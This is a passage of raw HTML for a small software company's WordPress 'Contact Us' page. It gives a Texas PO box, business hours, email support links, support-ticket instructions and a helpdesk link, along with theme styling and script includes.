Creole","mejs.hebrew":"Hebrew","mejs.hindi":"Hindi","mejs.hungarian":"Hungarian","mejs.icelandic":"Icelandic","mejs.indonesian":"Indonesian","mejs.irish":"Irish","mejs.italian":"Italian","mejs.japanese":"Japanese","mejs.korean":"Korean","mejs.latvian":"Latvian","mejs.lithuanian":"Lithuanian","mejs.macedonian":"Macedonian","mejs.malay":"Malay","mejs.maltese":"Maltese","mejs.norwegian":"Norwegian","mejs.persian":"Persian","mejs.polish":"Polish","mejs.portuguese":"Portuguese","mejs.romanian":"Romanian","mejs.russian":"Russian","mejs.serbian":"Serbian","mejs.slovak":"Slovak","mejs.slovenian":"Slovenian","mejs.spanish":"Spanish","mejs.swahili":"Swahili","mejs.swedish":"Swedish","mejs.tagalog":"Tagalog","mejs.thai":"Thai","mejs.turkish":"Turkish","mejs.ukrainian":"Ukrainian","mejs.vietnamese":"Vietnamese","mejs.welsh":"Welsh","mejs.yiddish":"Yiddish"}}; </script> <script type='text/javascript' src='http://www.mdcdot.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.6-78496d1'></script> <script type='text/javascript' src='http://www.mdcdot.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/","classPrefix":"mejs-","stretching":"responsive"}; /* ]]> */ </script> <meta name="generator" content="Powered by LayerSlider 6.1.0 - Multi-Purpose, Responsive, Parallax, Mobile-Friendly Slider Plugin for WordPress." /> <link rel='https://api.w.org/' href='http://www.mdcdot.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.mdcdot.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.mdcdot.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.2" /> <link rel="canonical" href="http://www.mdcdot.com/" /> <link rel='shortlink' href='http://www.mdcdot.com/' /> <link rel="alternate" type="application/json+oembed" href="http://www.mdcdot.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.mdcdot.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="http://www.mdcdot.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.mdcdot.com%2F&#038;format=xml" /> <script id='__mdctrk' data-m='310' data-lp="off"> __dot_site_id = 7; __dot_user_id = 1; __dot_site = 'affiliates'; (function(d, t) { var g = d.createElement(t), s = d.getElementsByTagName(t)[0]; g.src = '//trk.mdcdot.com/js/mdctrkso.min.js'; s.parentNode.insertBefore(g, s); }(document, 'script')); </script> <!--[if IE 9]><link rel="stylesheet" type="text/css" href="http://www.mdcdot.com/wp-content/themes/startit/assets/css/ie9_stylesheet.min.css" media="screen"><![endif]--><meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress." /> <!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://www.mdcdot.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><meta name="generator" content="Powered by Slider Revolution 5.3.1.5 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /> <style type="text/css" id="wp-custom-css"> /* You can add your own CSS here. Click the help icon above to learn more. */ .qodef-light-header .qodef-top-bar .widget a:hover{ color : #00b4a4 !important; } </style> <style type="text/css" id="qode_startit-custom-css">.qodef-landing-custom .qodef-ptf-category-holder{ display:none !important; } .qodef-landing-custom .qodef-portfolio-list-holder-outer.qodef-ptf-standard article .qodef-item-image-holder{ border-radius: 3px 3px 0 0; backface-visibility: hidden; } .qodef-landing-custom .qodef-item-title{ text-align:center !important; padding: 28px 0 37px 0 !important; } .qodef-landing-custom .qodef-item-icons-holder .qodef-like, .qodef-landing-custom .qodef-item-icons-holder .qodef-portfolio-lightbox{ display:none !important; } .qodef-landing-custom .qodef-portfolio-item .qodef-portfolio-shader{ display:none !important; } .qodef-landing-custom .qodef-portfolio-list-holder-outer.qodef-ptf-standard article .qodef-item-icons-holder { width: 100%; top: -25%; left: 0; bottom: 0; height: 100%; padding: 0; -webkit-transform: translateY(0) scale(0); -ms-transform: translateY(0) scale(0); transform: translateY(0) scale(0); background-color: rgba(0, 0, 0, 0.15); border-radius: 100%; padding: 50% 0; display: block; -webkit-transition: -webkit-transform .5s cubic-bezier(.4,0,.2,1),opacity .2s; transition: transform .5s cubic-bezier(.4,0,.2,1),opacity .2s; } .qodef-landing-custom .qodef-portfolio-list-holder-outer.qodef-ptf-standard article:hover .qodef-item-icons-holder { opacity: 1; -webkit-transform: translateY(0) scale(1.2); -ms-transform: translateY(0) scale(1.2); transform: translateY(0) scale(1.2); -webkit-transition: -webkit-transform .35s cubic-bezier(.4,0,.2,1),opacity .35s; transition: transform .35s cubic-bezier(.4,0,.2,1),opacity .35s; } .qodef-landing-custom .qodef-item-icons-holder .qodef-preview{ position: absolute; top: 0; left:0; width:100%; height:100%; background-color: transparent !important; border:none !important; -ms-transform: translateY(0) rotate(0); -webkit-transform: translateY(0) rotate(0); transform: translateY(0) rotate(0); } .qodef-landing-custom .qodef-portfolio-list-holder article .qodef-item-icons-holder a:hover{ -ms-transform: translateY(0) rotate(0); -webkit-transform: translateY(0) rotate(0); transform: translateY(0) rotate(0); } .qodef-landing-custom .qodef-item-icons-holder .qodef-preview:before{ content: "\f002" !important; font-size: 22px; position: relative; top: 50%; -webkit-transform: translateY(-65%) translateX(-50%); -ms-transform: translateY(-75%) translateX(-50%); transform: translateY(-75%) translateX(-50%); width: 60px; height: 60px; display: block; background: #b2dd4c; border-radius: 100%; text-align: center; line-height: 60px; left: 50%; } .page-id-2689 .qodef-page-header .qodef-position-right, .page-id-2689 .qodef-sticky-holder, .page-id-2689 footer, .page-id-2689 #qodef-back-to-top{ display: none !important; } .page-id-2689 #qodef-particles .qodef-p-content{ width:auto; } .qodef-va-fix { vertical-align: middle; } @media only screen and (max-width: 1284px) { .page-id-3520.qodef-header-vertical footer .qodef-four-columns .qodef-column { width: 49.5%; min-height: initial !important; } } @media only screen and (max-width: 1024px) { .page-id-2476 #qodef-meetup-slider.carousel .carousel-inner .item:nth-child(1) .qodef-slider-content, .page-id-2476 #qodef-meetup-slider.carousel .carousel-inner .item:nth-child(3) .qodef-slider-content{ padding-right: 80px; } .page-id-2476 #qodef-meetup-slider.carousel .carousel-inner .item:nth-child(1) .qodef-graphic-content, .page-id-2476 #qodef-meetup-slider.carousel .carousel-inner .item:nth-child(3) .qodef-graphic-content { padding-right: 0; } .page-id-2476 #qodef-meetup-slider.carousel .carousel-inner .item:nth-child(2) .qodef-graphic-content, .page-id-2476 #qodef-meetup-slider.carousel .carousel-inner .item:nth-child(4) .qodef-graphic-content { display: none; } .page-id-2476 #qodef-meetup-slider.carousel .carousel-inner .item:nth-child(2) .qodef-slider-content, .page-id-2476 #qodef-meetup-slider.carousel .carousel-inner .item:nth-child(4) .qodef-slider-content{ padding-left: 80px; } } @media only screen and (max-width: 768px) { .page-id-2476 #qodef-meetup-slider.carousel .carousel-inner .item:nth-child(1) .qodef-slider-content, .page-id-2476 #qodef-meetup-slider.carousel .carousel-inner .item:nth-child(3) .qodef-slider-content{ padding-left: 80px; } .page-id-2476 #qodef-meetup-slider.carousel .carousel-inner .item:nth-child(1) .qodef-graphic-content, .page-id-2476 #qodef-meetup-slider.carousel .carousel-inner .item:nth-child(3) .qodef-graphic-content { display: none; } .page-id-3520.qodef-header-vertical footer .qodef-four-columns .qodef-column { width: 100%; min-height: initial !important; } } @media only screen and (max-width: 480px) { .page-id-2476 #qodef-meetup-slider.carousel .carousel-inner .item:nth-child(1) .qodef-slider-content, .page-id-2476 #qodef-meetup-slider.carousel .carousel-inner .item:nth-child(2) .qodef-slider-content, .page-id-2476 #qodef-meetup-slider.carousel .carousel-inner .item:nth-child(3) .qodef-slider-content, .page-id-2476 #qodef-meetup-slider.carousel .carousel-inner .item:nth-child(4) .qodef-slider-content { padding-left: 20px; } } .landing-new-custom .qodef-portfolio-item .qodef-portfolio-shader{ background-color: rgba(34, 34, 34, 0.8); -webkit-transform: scale(1); -ms-transform: scale(1); transform: scale(1); border-radius:0; top:0; left:0; padding:0; border-radius: 15px; } .landing-new-custom .qodef-portfolio-list-holder-outer .qodef-item-title{ font-size:22px; color:#fff; font-weight:700; } .landing-new-custom .qodef-portfolio-list-holder-outer .qodef-item-text-holder .qodef-ptf-category-holder{ display:none; } .landing-new-custom .qodef-portfolio-list-holder-outer article{ border-radius: 15px; overflow:hidden; box-shadow: 4px 4px 15px #c3c3c3; transform: translateZ(0px); } .landing-new-custom .qodef-portfolio-filter-holder .qodef-portfolio-filter-holder-inner ul li span{ font-size:16px; color: #686868; } .landing-new-custom .qodef-portfolio-filter-holder .qodef-portfolio-filter-holder-inner ul li span:hover{ color:#b2dd4c; } .landing-new-custom .qodef-portfolio-filter-holder{ margin-bottom: 86px; } *::before, *::after { box-sizing: border-box; } *::before, *::after { box-sizing: border-box; } .lead-name { display: block; font-family: "Roboto Condensed",sans-serif; text-transform: uppercase; } .brand-link { color: #00b4a4; } a { color: #00b4a4; cursor: pointer; text-decoration: underline; } a { color: #00b4a4; text-decoration: none; } a { background: transparent none repeat scroll 0 0; } * { box-sizing: border-box; } .table > thead > tr > th, .mdcdot-table .table > thead > tr > td, .table > thead > tr > td, .table > tbody > tr > th, .mdcdot-table .table > tbody > tr > td, .table > tbody > tr > td, .table > tfoot > tr > th, .mdcdot-table .table > tfoot > tr > td, .table > tfoot > tr > td { line-height: 1.42857; } table { border-collapse: collapse; border-spacing: 0; } table { border-collapse: collapse; border-spacing: 0; } body { -moz-osx-font-smoothing: grayscale; color: #000033; font-family: "Roboto Condensed",sans-serif; font-size: 16px; font-weight: 200; } html { font-size: 62.5%; } html { font-family: sans-serif; } footer .qodef-footer-top-holder { background-color: #FFFFFF; background-position: center center; background-size: cover; display: block; } footer .widget .textwidget { color: #333333; } footer a { color: #00b4a4; text-decoration: none; font-weight: 400; } footer a-hover { color: #00b4a4; text-decoration: none; } footer .qodef-footer-bottom-holder { background-color: #FFFFFF; display: inline-block; padding: 30px 0; text-align: center; vertical-align: middle; width: 100%; } footer .qodef-footer-top .qodef-column { border-right: 1px solid #000644; box-sizing: border-box; padding: 0 40px; } footer .widget .qodef-footer-widget-title, footer .widget h4 { color: #000644; font-size: 22px; font-weight: 700; margin-bottom: 25px; } footer .qodef-footer-bottom-holder .qodef-column-inner { text-align: center; font-size: 14px; } .qodef_twitter_widget li .tweet_content_holder { color: #333333; font-size: 14px; } .qodef-mobile-header .qodef-mobile-nav { padding-bottom: 20px; } footer .widget .qodef-footer-widget-title, footer .widget h4 { color: #000644; font-size: 22px; font-weight: 700; margin-bottom: 5px; } .qodef-page-header .qodef-sticky-header .qodef-sticky-holder { background-color: #00b4a4; border-bottom: 0px solid #e7e7e7; height: 100%; position: relative; z-index: 2; } .qodef-author-description { display: none; margin-bottom: 30px; vertical-align: middle; width: 100%; } .qodef-side-menu .widget a, .qodef-sidebar .widget a { color: #12a793; } .qodef-blog-holder article .qodef-post-title { font-size: 25px; margin-bottom: 5px; position: relative; z-index: 20; } .hiderow {display: none}</style><style type="text/css" data-type="vc_custom-css">.qodef-iwt.qodef-iwt-icon-left.qodef-iwt-icon-tiny .qodef-iwt-icon-holder { display: inline-block; float: none; vertical-align: middle; width: 9%; } .qodef-iwt .qodef-iwt-link { display: inline-block; margin-top: 0px; }</style><style type="text/css" data-type="vc_shortcodes-custom-css">.vc_custom_1445592505862{padding-bottom: 20px !important;}.vc_custom_1445592505862{padding-bottom: 20px !important;}</style><noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript></head> <body class="home page-template page-template-full-width page-template-full-width-php page page-id-598 qode-core-1.3.1 startit-ver-2.2 qodef-smooth-scroll qodef-top-bar-mobile-hide qodef-header-standard qodef-sticky-header-on-scroll-down-up qodef-default-mobile-header qodef-sticky-up-mobile-header qodef-dropdown-animate-height qodef-light-header qodef-search-covers-header wpb-js-composer js-comp-ver-5.0.1 vc_responsive"> <div class="qodef-wrapper"> <div class="qodef-wrapper-inner"> <div class="qodef-top-bar"> <div class="qodef-vertical-align-containers qodef-50-50"> <div class="qodef-position-left"> <div class="qodef-position-left-inner"> <div id="nav_menu-2" class="widget widget_nav_menu qodef-top-bar-widget"></div> </div> </div> <div class="qodef-position-right"> <div class="qodef-position-right-inner"> <div id="nav_menu-9" class="widget widget_nav_menu qodef-top-bar-widget"><div class="menu-topbar-container"><ul id="menu-topbar" class="menu"><li id="menu-item-6503" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6503"><a href="http://www.mdcdot.com/login/">Forget Your Login URL?</a></li> </ul></div></div> </div> </div> </div> </div> <header class="qodef-page-header"> <div class="qodef-menu-area"> <form role="search" action="http://www.mdcdot.com/" class="qodef-search-cover" method="get"> <div class="qodef-form-holder-outer"> <div class="qodef-form-holder"> <div class="qodef-form-holder-inner"> <input type="text" placeholder="Search" name="s" class="qode_search_field no-livesearch" autocomplete="off" /> <div class="qodef-search-close"> <a href="#"> <i class="qodef-icon-ion-icon ion-close "></i> </a> </div> </div> </div> </div> </form> <div class="qodef-vertical-align-containers"> <div class="qodef-position-left"> <div class="qodef-position-left-inner"> <div class="qodef-logo-wrapper"> <a href="http://www.mdcdot.com/" style="height: 60px;"> <img class="qodef-normal-logo" src="http://mdcdot.com/wp-content/uploads/2017/01/Dark-MDCDOT.png" alt="logo" /> <img class="qodef-dark-logo" src="http://mdcdot.com/wp-content/uploads/2017/01/Dark-MDCDOT.png" alt="dark logo" /> <img class="qodef-light-logo" src="http://mdcdot.com/wp-content/uploads/2017/03/Logo-white-150dpi-shadow.png" alt="light logo" /> </a> </div> </div> </div> <div class="qodef-position-right"> <div class="qodef-position-right-inner"> <nav class="qodef-main-menu qodef-drop-down qodef-default-nav"> <ul id="menu-small-business-top" class="clearfix"><li id="nav-menu-item-5749" class="menu-item menu-item-type-custom menu-item-object-custom narrow"><a href="https://helpdesk.mdcdot.com/" class=""><span class="item_outer"><span class="item_inner"><span class="menu_icon_wrapper"><i class="menu_icon null fa"></i></span><span class="item_text">Helpdesk</span></span><span class="plus"></span></span></a></li> <li id="nav-menu-item-5750" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-598 current_page_item qodef-active-item narrow"><a href="http://www.mdcdot.com/" class=" current "><span class="item_outer"><span class="item_inner"><span class="menu_icon_wrapper"><i class="menu_icon null fa"></i></span><span class="item_text">Contact Us</span></span><span class="plus"></span></span></a></li> </ul></nav> <a data-icon-close-same-position="yes" class="qodef-search-opener" href="javascript:void(0)"> <i class="qodef-icon-ion-icon ion-ios-search-strong "></i> </a> </div> </div> </div> </div> <div class="qodef-sticky-header"> <form role="search" action="http://www.mdcdot.com/" class="qodef-search-cover" method="get"> <div class="qodef-form-holder-outer"> <div class="qodef-form-holder"> <div class="qodef-form-holder-inner"> <input type="text" placeholder="Search" name="s" class="qode_search_field no-livesearch" autocomplete="off" /> <div class="qodef-search-close"> <a href="#"> <i class="qodef-icon-ion-icon ion-close "></i> </a> </div> </div> </div> </div> </form> <div class="qodef-sticky-holder"> <div class=" qodef-vertical-align-containers"> <div class="qodef-position-left"> <div class="qodef-position-left-inner"> <div class="qodef-logo-wrapper"> <a href="http://www.mdcdot.com/" style="height: 61px;"> <img class="qodef-normal-logo" src="http://mdcdot.com/wp-content/uploads/2017/03/Logo-white-150dpi-sticky2.png" alt="logo" /> <img class="qodef-dark-logo" src="http://mdcdot.com/wp-content/uploads/2017/01/Dark-MDCDOT.png" alt="dark logo" /> <img class="qodef-light-logo" src="http://mdcdot.com/wp-content/uploads/2017/03/Logo-white-150dpi-shadow.png" alt="light logo" /> </a> </div> </div> </div> <div class="qodef-position-right"> <div class="qodef-position-right-inner"> <nav class="qodef-main-menu qodef-drop-down qodef-sticky-nav"> <ul id="menu-small-business-top-1" class="clearfix"><li id="sticky-nav-menu-item-5749" class="menu-item menu-item-type-custom menu-item-object-custom narrow"><a href="https://helpdesk.mdcdot.com/" class=""><span class="item_outer"><span class="item_inner"><span class="menu_icon_wrapper"><i class="menu_icon null fa"></i></span><span class="item_text">Helpdesk</span></span><span class="plus"></span></span></a></li> <li id="sticky-nav-menu-item-5750" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-598 current_page_item qodef-active-item narrow"><a href="http://www.mdcdot.com/" class=" current "><span class="item_outer"><span class="item_inner"><span class="menu_icon_wrapper"><i class="menu_icon null fa"></i></span><span class="item_text">Contact Us</span></span><span class="plus"></span></span></a></li> </ul></nav> <a data-icon-close-same-position="yes" class="qodef-search-opener" href="javascript:void(0)"> <i class="qodef-icon-ion-icon ion-ios-search-strong "></i> </a> </div> </div> </div> </div> </div> </header> <header class="qodef-mobile-header"> <div class="qodef-mobile-header-inner"> <div class="qodef-mobile-header-holder"> <div class="qodef-grid"> <div class="qodef-vertical-align-containers"> <div class="qodef-mobile-menu-opener"> <a href="javascript:void(0)"> <span class="qodef-mobile-opener-icon-holder"> <i class="qodef-icon-font-awesome fa fa-bars "></i> </span> </a> </div> <div class="qodef-position-center"> <div class="qodef-position-center-inner"> <div class="qodef-mobile-logo-wrapper"> <a href="http://www.mdcdot.com/" style="height: 76px"> <img src="http://mdcdot.com/wp-content/uploads/2017/01/Light-MDCDOT-150dpi-fixed-1.png" alt="mobile-logo" /> </a> </div> </div> </div> <div class="qodef-position-right"> <div class="qodef-position-right-inner"> </div> </div> </div> </div> </div> <nav class="qodef-mobile-nav"> <div class="qodef-grid"> <ul id="menu-small-business-top-2" class=""><li id="mobile-menu-item-5749" class="menu-item menu-item-type-custom menu-item-object-custom "><a href="https://helpdesk.mdcdot.com/" class=""><span>Helpdesk</span></a></li> <li id="mobile-menu-item-5750" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-598 current_page_item qodef-active-item"><a href="http://www.mdcdot.com/" class=" current "><span>Contact Us</span></a></li> </ul> </div> </nav> </div> </header> <a id='qodef-back-to-top' href='#'> <span class="qodef-icon-stack"> <i class="qodef-icon-font-awesome fa fa-chevron-up "></i> </span> </a> <div class="qodef-content"> <div class="qodef-content-inner"> <div class="qodef-title qodef-standard-type qodef-content-center-alignment qodef-animation-no" style="height:300px;background-color:#000644;" data-height="300"> <div class="qodef-title-image"></div> <div class="qodef-title-holder"> <div class="qodef-container clearfix"> <div class="qodef-container-inner"> <div class="qodef-title-subtitle-holder" style=""> <div class="qodef-title-subtitle-holder-inner"> <h1><span>Contact Us</span></h1> <span class="qodef-subtitle"><span>We’d love to hear from you.</span></span> </div> </div> </div> </div> </div> </div> <div class="qodef-full-width"> <div class="qodef-full-width-inner"> <div class="vc_row wpb_row vc_row-fluid qodef-section vc_custom_1445592505862 qodef-content-aligment-left qodef-grid-section" style=""><div class="clearfix qodef-section-inner"><div class="qodef-section-inner-margin clearfix"><div class="wpb_column vc_column_container vc_col-sm-6 vc_hidden-md vc_hidden-sm vc_hidden-xs"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="vc_empty_space" style="height: 72px"><span class="vc_empty_space_inner"></span></div> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <h1>General Inquires</h1> </div> </div> <div class="vc_empty_space" style="height: 33px"><span class="vc_empty_space_inner"></span></div> <div class="qodef-iwt clearfix qodef-iwt-left-from-title qodef-iwt-icon-tiny"> <div class="qodef-iwt-content-holder"> <div class="qodef-iwt-icon-title-holder"> <div class="qodef-iwt-icon-holder"> <span class="qodef-icon-shortcode circle" style="width: 37px;height: 37px;line-height: 37px" data-hover-background-color="#979797"> <i class="qodef-icon-simple-line-icon icon-pin qodef-icon-element" style="font-size:14px"></i> </span> </div> <div class="qodef-iwt-title-holder"> <h4>PO BOX 2921 Waxahachie, Texas 75165-3348</h4> </div> </div> <div class="qodef-iwt-text-holder"> <p></p> </div> </div> </div><div class="vc_empty_space" style="height: 8px"><span class="vc_empty_space_inner"></span></div> <div class="qodef-iwt clearfix qodef-iwt-left-from-title qodef-iwt-icon-tiny"> <div class="qodef-iwt-content-holder"> <div class="qodef-iwt-icon-title-holder"> <div class="qodef-iwt-icon-holder"> <span class="qodef-icon-shortcode circle" style="width: 37px;height: 37px;line-height: 37px" data-hover-background-color="#979797"> <i class="qodef-icon-simple-line-icon icon-home qodef-icon-element" style="font-size:14px"></i> </span> </div> <div class="qodef-iwt-title-holder"> <h4>Business Hours: Mon - Fri 8:30a - 4:30p CST</h4> </div> </div> <div class="qodef-iwt-text-holder"> <p></p> </div> </div> </div><div class="vc_empty_space" style="height: 8px"><span class="vc_empty_space_inner"></span></div> <div class="qodef-iwt clearfix qodef-iwt-icon-left qodef-iwt-icon-tiny"> <div class="qodef-iwt-icon-holder"> <span class="qodef-icon-shortcode circle" style="width: 37px;height: 37px;line-height: 37px" data-hover-background-color="#979797"> <i class="qodef-icon-simple-line-icon icon-envelope qodef-icon-element" style="font-size:14px"></i> </span> </div> <div class="qodef-iwt-content-holder"> <div class="qodef-iwt-text-holder"> <p></p> <a class="qodef-iwt-link" href="/cdn-cgi/l/email-protection#95fdf0f9e5d5f8ecf1fcf2fce1f4f9f6f9fcf0fbe1e6bbf6faf8" target="_self">Click here to email support</a> </div> </div> </div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-6 vc_hidden-md vc_hidden-sm vc_hidden-xs"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="vc_empty_space" style="height: 72px"><span class="vc_empty_space_inner"></span></div> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <h1 style="text-align: left;">Support &amp; Billing</h1> </div> </div> <div class="vc_empty_space" style="height: 33px"><span class="vc_empty_space_inner"></span></div> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <p style="margin-bottom: 20px; text-align: left;"><strong>Submit a support ticket </strong>via the application by clicking the (?) icon or by sending an email to <a href="/cdn-cgi/l/email-protection#375f525b47775a4e535e505e43565b545b5e525943441954585a">Click Here</a>.</p> <p style="margin-bottom: 20px; text-align: left;"><strong>Looking for phone support?</strong> submit a support ticket first and if we can&#8217;t solve your issue via the ticket then a customer service agent will schedule a time to contact you by phone.</p> <p style="text-align: left;"><strong>Visit our <a href="https://helpdesk.mdcdot.com/">helpdesk</a></strong> to gain access to over 100 articles about how to use the application.</p> </div> </div> </div></div></div></div></div></div><div class="vc_row wpb_row vc_row-fluid qodef-section vc_custom_1445592505862 qodef-content-aligment-left qodef-grid-section" style=""><div class="clearfix qodef-section-inner"><div class="qodef-section-inner-margin clearfix"><div class="wpb_column vc_column_container vc_col-sm-6 vc_hidden-lg"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="vc_empty_space" style="height: 72px"><span class="vc_empty_space_inner"></span></div> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <h1 style="text-align: center;">General Inquires</h1> </div> </div> <div class="vc_empty_space" style="height: 33px"><span class="vc_empty_space_inner"></span></div> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <p style="text-align: center;">PO BOX 2921 Waxahachie, Texas 75165-3348</p> <p style="text-align: center;">Business Hours: Mon &#8211; Fri 8:30a &#8211; 4:30p CST</p> <p style="text-align: center;"><a href="/cdn-cgi/l/email-protection#0b636e677b4b66726f626c627f6a676867626e657f7825686466">Email Support Click Here</a></p> </div> </div> <div class="vc_empty_space" style="height: 33px"><span class="vc_empty_space_inner"></span></div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-6 vc_hidden-lg"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="vc_empty_space" style="height: 72px"><span class="vc_empty_space_inner"></span></div> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <h1 style="text-align: left;">Support &amp; Billing</h1> </div> </div> <div class="vc_empty_space" style="height: 33px"><span class="vc_empty_space_inner"></span></div> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <p style="margin-bottom: 20px; text-align: left;"><strong>Submit a support ticket </strong>via the application by clicking the (?) icon or by sending an email to <a href="/cdn-cgi/l/email-protection#f49c919884b4998d909d939d80959897989d919a8087da979b99">Click Here</a>.</p> <p style="margin-bottom: 20px; text-align: left;"><strong>Looking for phone support?</strong> submit a support ticket first and if we can&#8217;t solve your issue via the ticket then a customer service agent will schedule a time to contact you by phone.</p> <p style="text-align: left;"><strong>Visit our <a href="https://helpdesk.mdcdot.com/">helpdesk</a></strong> to gain access to over 100 articles about how to use the application.</p> </div> </div> </div></div></div></div></div></div><div class="vc_row wpb_row vc_row-fluid qodef-section qodef-content-aligment-left" style=""><div class="clearfix qodef-full-section-inner"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="vc_empty_space" style="height: 10px"><span class="vc_empty_space_inner"></span></div> </div></div></div></div><svg class="qodef_angled_shape qodef_svg_bottom" preserveAspectRatio="none" viewBox="0 0 86 86" width="100%" height="180"><polygon points="0,0 0,86 86,0" style="fill:#ffffff;" /></svg></div> </div> </div> </div> </div> <footer> <div class="qodef-footer-inner clearfix"> <div class="qodef-footer-top-holder"> <div class="qodef-footer-top qodef-footer-top-full"> <div class="qodef-four-columns clearfix"> <div class="qodef-four-columns-inner"> <div class="qodef-column"> <div class="qodef-column-inner"> </div> </div> <div class="qodef-column"> <div class="qodef-column-inner"> </div> </div> <div class="qodef-column"> <div class="qodef-column-inner"> </div> </div> <div class="qodef-column"> <div class="qodef-column-inner"> </div> </div> </div> </div> </div> </div> <div class="qodef-footer-bottom-holder"> <div class="qodef-footer-bottom-holder-inner"> <div class="qodef-column-inner"> <div id="text-16" class="widget qodef-footer-text widget_text"> <div class="textwidget"><p><a href="http://www.mdcdot.com/anti-spam-policy/">Anti-Spam Policy</a> | <a href="http://www.mdcdot.com/privacy-policy/">Privacy Policy</a> | <a href="http://www.mdcdot.com/subscriber-privacy-policy/">Subscriber Privacy Policy</a> | <a href="http://www.mdcdot.com/terms-of-service-master-subscriber/">Terms of Use &#8211; Master Subscriber</a> | <a href="http://www.mdcdot.com/terms-of-service-sub-account-user/">Terms of Use &#8211; Sub Account User</a><br /> Copyright © 2018 MyDigitalClients, LLC. All rights reserved.</p> </div> </div></div> </div> </div> </div> </footer> </div> </div> <div id="su-footer-links" style="text-align: center;"></div><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type='text/javascript' src='http://www.mdcdot.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://www.mdcdot.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://www.mdcdot.com/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://www.mdcdot.com/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://www.mdcdot.com/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5.2'></script> <script type='text/javascript' src='http://www.mdcdot.com/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://www.mdcdot.com/wp-includes/js/jquery/ui/slider.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://www.mdcdot.com/wp-content/themes/startit/assets/js/third-party.min.js?ver=5.2'></script> <script type='text/javascript' src='http://www.mdcdot.com/wp-content/plugins/js_composer/assets/lib/bower/isotope/dist/isotope.pkgd.min.js?ver=5.0.1'></script> <script type='text/javascript' src='http://www.mdcdot.com/wp-content/themes/startit/assets/js/smoothPageScroll.js?ver=5.2'></script> <script type='text/javascript' src='//maps.googleapis.com/maps/api/js?ver=5.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var qodefGlobalVars = {"vars":{"qodefAddForAdminBar":0,"qodefElementAppearAmount":-150,"qodefFinishedMessage":"No more posts","qodefMessage":"Loading new posts...","qodefTopBarHeight":40,"qodefStickyHeaderHeight":0,"qodefStickyHeaderTransparencyHeight":100,"qodefLogoAreaHeight":0,"qodefMenuAreaHeight":140,"qodefStickyHeight":100,"qodefMobileHeaderHeight":75}}; var qodefPerPageVars = {"vars":{"qodefStickyScrollAmount":0,"qodefHeaderTransparencyHeight":0}}; /* ]]> */ </script> <script type='text/javascript' src='http://www.mdcdot.com/wp-content/themes/startit/assets/js/modules.js?ver=5.2'></script> <script type='text/javascript' src='http://www.mdcdot.com/wp-includes/js/comment-reply.min.js?ver=5.2'></script> <script type='text/javascript' src='http://www.mdcdot.com/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=5.0.1'></script> <script type='text/javascript' src='http://www.mdcdot.com/wp-content/themes/startit/assets/js/like.min.js?ver=1.0'></script> <script type='text/javascript' src='http://www.mdcdot.com/wp-includes/js/wp-embed.min.js?ver=5.2'></script> </body> </html>
0
